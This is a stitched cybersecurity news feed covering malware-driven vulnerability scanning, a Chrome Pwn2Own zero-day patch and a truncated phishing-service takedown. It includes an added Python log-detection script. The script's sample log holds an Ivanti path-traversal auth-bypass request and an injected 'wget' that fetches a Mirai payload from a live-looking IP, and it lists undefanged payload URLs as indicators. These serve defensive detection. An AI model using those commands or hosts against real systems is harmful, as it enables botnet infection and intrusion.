Russian cybersecurity firm Kaspersky says some iPhones on its network were hacked using an iOS vulnerability that installed malware via iMessage zero-click exploits. Russia blames these attacks on US intelligence agencies.
Hackers Using Malware-Driven Scanning Attacks To Pinpoint Vulnerabilities
Attackers are increasingly using malware-infected devices to scan target networks rather than scanning from their own infrastructure. Routing scans through compromised hosts hides the attacker's origin, evades geographical restrictions (geofencing), and feeds newly found victims back into their botnets.
Compromised hosts also provide far more capacity for large-scale scans than a single attacker machine could. Defenders can detect both established and novel scanning patterns by analyzing scan characteristics such as request volume and matching requests against known threat signatures.
Attackers use scanning to probe target networks for weaknesses: open ports, vulnerable software versions, and even the operating system in use. By exploiting the weaknesses they find, attackers can gain unauthorized access or disrupt systems.
In one example, the attacker sends an HTTP POST request to random-university.edu to test for the MOVEit Transfer vulnerability (CVE-2023-34362); a successful probe can be followed directly by compromise.
Analysis of traffic logs across multiple networks identified a significant increase in scanning activity aimed at potential vulnerabilities.
One example was an unusually high request volume (7,147 requests in 2023) to endpoints associated with the MOVEit vulnerability (CVE-2023-34362).
The requests appeared before the vulnerability was publicly known, and the telemetry further revealed over 66 million requests in 2023 that could be linked to scanning.
Attackers were observed using novel URLs within their exploits to bypass security measures.
Palo Alto Networks identified two such instances: a Mirai variant using “103.245.236[.]188/skyljne.mips” and an attempt to exploit Ivanti vulnerabilities with “45.130.22[.]219/ivanti.js”.
In both cases, the scanning requests preceded the detection of subsequent malicious payloads, highlighting the importance of proactive scanning detection for timely threat mitigation.
Attackers use malware to hijack infected devices and turn them into scanners: the implant contacts an attacker-controlled server for instructions and, on receiving a scan command, probes the target domains it is given.
This lets the attacker evade detection and borrow the resources of compromised devices for large-scale vulnerability scanning. The targets vary with the attacker's goals, from focused attacks against specific entities to widespread scanning intended to infect more devices.
One Mirai variant exploits a Zyxel router vulnerability caused by insufficient input validation to download a malicious file and copy itself onto the device; in one distributed scan, 2,247 infected devices probed 15,812 targets.
These botnets keep incorporating new vulnerabilities, so defenders need to patch promptly and update detection systems to block new variants; monitoring scanning activity across multiple networks helps surface new scanning patterns sooner.
Two chained vulnerabilities (CVE-2023-46805 and CVE-2024-21887) were recently used in an attack campaign against Ivanti products: the attackers used path traversal in a GET request to bypass authentication for a path that had a command injection vulnerability.
This let them execute commands and potentially gain access to vulnerable systems; in the observed activity the attack was used to harvest the IP addresses of potential targets through a DNS logging service.
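The detection approach described above (request-volume analysis against watchlisted endpoints, signature matching on known payload URLs, and spotting the path-traversal authentication bypass used in the Ivanti chain) can be applied to ordinary web access logs. The following is an added example, not code from Palo Alto Networks or from the original article. The log lines are constructed, the watchlist prefixes are illustrative placeholders to be replaced with your own intelligence, and the Ivanti traversal path in the sample is modelled on public write-ups of the chain rather than taken from this page; the two payload URLs are the ones the article names, undefanged.

```python
"""Scan-pattern detection over web access logs: request-volume spikes to
watchlisted endpoints, path-traversal auth-bypass attempts, and references
to known malicious payload URLs. Added example; inputs are constructed."""
import re
from collections import Counter
from urllib.parse import unquote

# Combined-log-format line, e.g.
# 203.0.113.7 - - [09/Apr/2024:10:00:01 +0000] "POST /path HTTP/1.1" 404 512
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \d+'
)

# Endpoint prefixes worth counting (assumed/illustrative placeholders).
WATCHLIST = {
    "/moveitisapi/": "CVE-2023-34362 (MOVEit Transfer) probing",
    "/api/v1/": "Ivanti Connect Secure API probing",
}
# Payload-hosting URLs named in the article (defanged there, undefanged here).
PAYLOAD_IOCS = ("103.245.236.188/skyljne.mips", "45.130.22.219/ivanti.js")
VOLUME_THRESHOLD = 3  # requests from one source to one watchlisted prefix

# Constructed sample log (not real telemetry).
SAMPLE_LOGS = """\
203.0.113.7 - - [09/Apr/2024:10:00:01 +0000] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 404 512
203.0.113.7 - - [09/Apr/2024:10:00:02 +0000] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 404 512
203.0.113.7 - - [09/Apr/2024:10:00:03 +0000] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 404 512
198.51.100.4 - - [09/Apr/2024:10:01:00 +0000] "GET /api/v1/totp/user-backup-code/../../license/keys-status/ HTTP/1.1" 200 320
198.51.100.77 - - [09/Apr/2024:10:01:30 +0000] "GET /?cmd=wget%20http://103.245.236.188/skyljne.mips HTTP/1.1" 400 0
192.0.2.9 - - [09/Apr/2024:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""


def parse_line(line):
    """Return a dict with src/ts/method/target/status/path, or None on no match.
    `path` is the URL-decoded request path without the query string."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = unquote(rec["target"].split("?", 1)[0])
    return rec


def has_traversal(path):
    """True if any path segment is '..' (after decoding); attackers use this to
    reach a handler the authentication layer does not protect."""
    return any(seg == ".." for seg in path.split("/"))


def detect(lines):
    """Run all three rules over log lines; returns (rule, source_ip, detail) tuples."""
    findings = []
    volume = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        src, path, target = rec["src"], rec["path"], rec["target"]
        if has_traversal(path):
            findings.append(("path_traversal", src, target))
        decoded = unquote(target)  # payload URLs are often percent-encoded in a query
        for ioc in PAYLOAD_IOCS:
            if ioc in decoded:
                findings.append(("payload_url", src, ioc))
        for prefix in WATCHLIST:
            if path.startswith(prefix):
                volume[(src, prefix)] += 1
    for (src, prefix), n in volume.items():
        if n >= VOLUME_THRESHOLD:
            findings.append(("volume", src, f"{n} requests to {prefix}: {WATCHLIST[prefix]}"))
    return findings


if __name__ == "__main__":
    for rule, src, detail in detect(SAMPLE_LOGS.splitlines()):
        print(f"{rule:15} {src:15} {detail}")
```

In production the volume rule should be evaluated per time window rather than over the whole file, and the traversal rule is deliberately applied after URL decoding so that `%2e%2e` variants are not missed.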
Attackers target common technologies such as routers, web application frameworks, and collaboration tools. The data shows widespread vulnerability scans against routers, including recent attacks on Ubiquiti EdgeRouters and on Cisco and NetGear routers attributed to Russian and Chinese actors; this activity is not limited to particular router brands.
The post Hackers Using Malware-Driven Scanning Attacks To Pinpoint Vulnerabilities appeared first on Cyber Security News.
Chrome Zero-Day Vulnerability Exploited At Pwn2Own : Patch Now
Google fixed three vulnerabilities in the Chrome browser on Tuesday, among them a zero-day that was exploited during the Pwn2Own Vancouver 2024 hacking contest.
This follows Google's fix in late March for two other zero-day vulnerabilities exploited at the same competition.
Palo Alto Networks’ Edouard Bochin (@le_douds) and Tao Yan (@Ga1ois) reported the vulnerability identified as CVE-2024-3159 on March 22, 2024, during Pwn2Own 2024.
The pair received $42,500 and 9 Master of Pwn points for successfully demonstrating their attack against both Microsoft Edge and Google Chrome.
Confirmed! @le_douds and @Ga1ois from Palo Alto used an OOB Read plus a novel technique for defeating V8 hardening to get arbitrary code execution in the renderer. They were able to exploit #Chrome and #Edge with the same bugs, earning $42,500 and 9 Master of Pwn points. #Pwn2Own pic.twitter.com/EhFIEntnPw
— Zero Day Initiative (@thezdi) March 21, 2024
Google has fixed the vulnerabilities in the Chrome Stable channel, which moves to 123.0.6312.105/.106/.107 for Windows and Mac and 123.0.6312.105 for Linux. The update will roll out over the coming days and weeks.
The CVE-2024-3159 vulnerability is an out-of-bounds memory access in the V8 JavaScript engine.
A remote attacker who tricks a victim into visiting a specially crafted HTML page can use this vulnerability to read memory beyond the bounds of a buffer and corrupt the heap.
Exploitation may crash the renderer or expose sensitive data; at Pwn2Own it was combined with a technique for defeating V8 hardening to achieve code execution in the renderer.
On the second day of Pwn2Own, security researchers Edouard Bochin and Tao Yan from Palo Alto Networks demonstrated the zero-day.
Google also fixed an inappropriate implementation in V8, tracked as CVE-2024-3156.
Following Zhenghang Xiao's (@Kipreyyy) report of the issue, Google paid a reward of $7,000.
CVE-2024-3158, a use-after-free in Bookmarks, was also fixed. After undoingfish reported the issue, Google paid a $3,000 reward.
To check the installed version on desktop, Chrome users can open Menu > Help > About Google Chrome or type chrome://settings/help into the address bar.
Opening that page triggers an update check; Chrome downloads and installs any update it finds, so it should detect and install the latest version.
The browser must be restarted to finish the update.
“Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven’t yet fixed”, Google said.
Google patched multiple Chrome browser vulnerabilities at the end of March, including two zero-day vulnerabilities that were disclosed during the Pwn2Own 2024. These vulnerabilities are identified as CVE-2024-2886 and CVE-2024-2887.
Mozilla also addressed two zero-day vulnerabilities in the Firefox web browser, tracked as CVE-2024-29944 and CVE-2024-29943, that were exploited by Manfred Paul (@_manfp) at the same Pwn2Own contest.
The post Chrome Zero-Day Vulnerability Exploited At Pwn2Own : Patch Now appeared first on Cyber Security News.
Major Phishing-as-a-Service Syndicate ‘BulletProofLink’ Dismantled by Malaysian Authorities
Malaysian law enforcement authorities have announced the takedown of a phishing-as-a-service (PhaaS) operation called BulletProofLink.
The Royal Malaysian Police said the effort, which was carried out with assistance from the Australian Federal Police (AFP) and the U.S. Federal Bureau of Investigation (FBI) on November 6, 2023, was based on information that the threat actors behind the platform
The Hacker News | #1 Trusted Cybersecurity News Site